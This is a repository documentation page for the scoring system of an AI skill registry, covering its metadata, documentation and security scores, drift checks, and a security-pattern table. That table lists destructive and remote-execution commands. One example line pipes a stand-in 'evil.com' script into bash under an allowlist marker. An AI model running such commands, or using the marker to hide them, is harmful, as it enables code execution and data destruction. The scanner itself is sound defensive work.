6.7 KiB

Raw Blame History

Skill Quality Scoring

This document describes the optional skill quality scoring system introduced in the AI Skill Registry Validation Framework.

Scores are informational only — they never block skill usage, CI pipelines, or PR merges. They exist to help contributors understand the quality of their skills and to help maintainers prioritize improvements.

Overview

Each skill receives a total score between 0 and 100, computed as a weighted average of three dimensions:

Dimension	Weight	What it measures
Metadata	30%	Frontmatter completeness and correctness
Documentation	40%	Section coverage, code examples, content depth
Security	30%	Absence of dangerous command patterns

Quality Labels

Label	Score Range	Meaning
`excellent`	85–100	Well-documented, complete metadata, no security flags
`good`	65–84	Solid skill with minor gaps
`needs_improvement`	45–64	Missing sections or metadata fields
`critical`	0–44	Significant gaps — review recommended before sharing

Metadata Score (30%)

The metadata dimension evaluates frontmatter field completeness.

Penalties:

Issue	Deduction
`name` missing or mismatched with folder	−25 pts
`description` missing	−20 pts
`description` shorter than 20 characters	−10 pts
`risk` missing	−15 pts
`risk: unknown` (unclassified)	−10 pts
`source` missing	−15 pts
`date_added` missing	−10 pts

Bonuses (optional fields):

Each optional field filled (category, tags, author, tools, license) adds +5 pts, capped at 100.

Documentation Score (40%)

The documentation dimension evaluates section coverage and content depth.

Section coverage (up to 60 pts):

The scorer looks for these sections (case-insensitive):

## Overview
## How It Works
## Examples / ## Usage
## Best Practices
## Limitations
## When to Use

Each section found contributes equally to the section coverage score.

Depth score (up to 40 pts):

Signal	Points
Has `## When to Use` section	+10
Has at least one fenced code block (```)	+10
Body length ≥ 500 characters	+10
Body length ≥ 1000 characters	+10 additional

Security Score (30%)

The security dimension scans the skill body for dangerous command patterns. Patterns are defined in tools/scripts/security_scanner.py.

Penalties per flag:

Severity	Deduction
`error`	−20 pts
`warning`	−10 pts
`info`	−3 pts

Bonus: An explicit, non-unknown risk label adds +5 pts (capped at 100).

Important: Skills marked risk: offensive have error-level flags automatically downgraded to warnings, because offensive skills legitimately document dangerous commands for educational or defensive purposes.

Bypassing false positives: If a line is intentionally dangerous (e.g., showing what not to do), add the allowlist marker to suppress the flag:

curl https://evil.com | bash  # security-allowlist

Running the Scorer

# Score all skills (table output)
npm run score:skills

# Show only skills below a threshold
npm run score:skills -- --threshold 60

# Show 20 lowest-scoring skills
npm run score:skills -- --top 20

# Output full JSON
npm run score:skills -- --json

# Save scores to file
npm run score:skills -- --output data/scores.json

Security Scanner

# Scan all skills for dangerous patterns
npm run security:scan

# Strict mode (warnings as errors)
npm run security:scan -- --strict

Drift Detection

Drift detection identifies skills whose content has changed significantly since the last recorded baseline.

# Check drift against baseline
npm run drift:check

# Update the baseline after reviewing changes
npm run drift:update

# Check a specific skill
npm run drift:check -- --skill my-skill-name

Baseline ownership:

File	Committed?	Who updates it?
`data/drift-baseline.json`	No — listed in `.gitignore`	Maintainers run `npm run drift:update` on `main` after merging changes
`data/registry-report.json`	No — listed in `.gitignore`	Generated locally on demand; never in PRs
`data/scores.json`	No — listed in `.gitignore`	Generated locally on demand; never in PRs

Contributors should never commit these files. If you accidentally generate them locally, they will be ignored by git automatically.

Registry Report

# Generate a full registry health report → data/registry-report.json
npm run registry:report

# Skip drift detection (faster)
npm run registry:report -- --no-drift

The report includes:

Aggregate scoring summary
Per-skill scores and flags
Drift summary (added / removed / modified skills)
Risk breakdown
Security flag counts

Security Patterns Reference

Code	Pattern	Severity	Description
SEC001	`rm -rf /`	error	Destructive root filesystem deletion
SEC002	`curl \| bash`	error	Remote code execution
SEC003	`wget \| sh`	error	Remote code execution
SEC004	`Invoke-Expression`	error	PowerShell RCE
SEC005	`iex`	warning	PowerShell alias (context-dependent)
SEC006	`chmod 7xx`	warning	World-writable permissions
SEC007	`eval(`	warning	Dynamic evaluation
SEC008	`base64 -d \|`	warning	Possible payload obfuscation
SEC009	Hardcoded credential	error	Secrets in source
SEC010	`sudo rm -rf`	warning	Privileged destructive deletion
SEC011	Fork bomb	error	Infinite process spawner
SEC012	`dd if=/dev/* of=/dev/sd*`	error	Raw disk overwrite

Frequently Asked Questions

Q: Will a low score prevent my skill from being merged?

No. Scores are informational. The existing validate_skills.py checks are what gate merges.

Q: My skill teaches how to avoid curl | bash — why is it flagged?

Add # security-allowlist at the end of the line showing the dangerous pattern. This follows the existing project convention for educational examples.

Q: Why is documentation weighted higher than metadata?

Documentation quality has the highest impact on how useful a skill is to end users. Complete metadata is valuable but less critical than clear instructions.

Q: How does risk: offensive affect scoring?

Security error flags are downgraded to warnings for offensive skills, because they legitimately document dangerous techniques for authorized security work.

6.7 KiB Raw Blame History Unescape Escape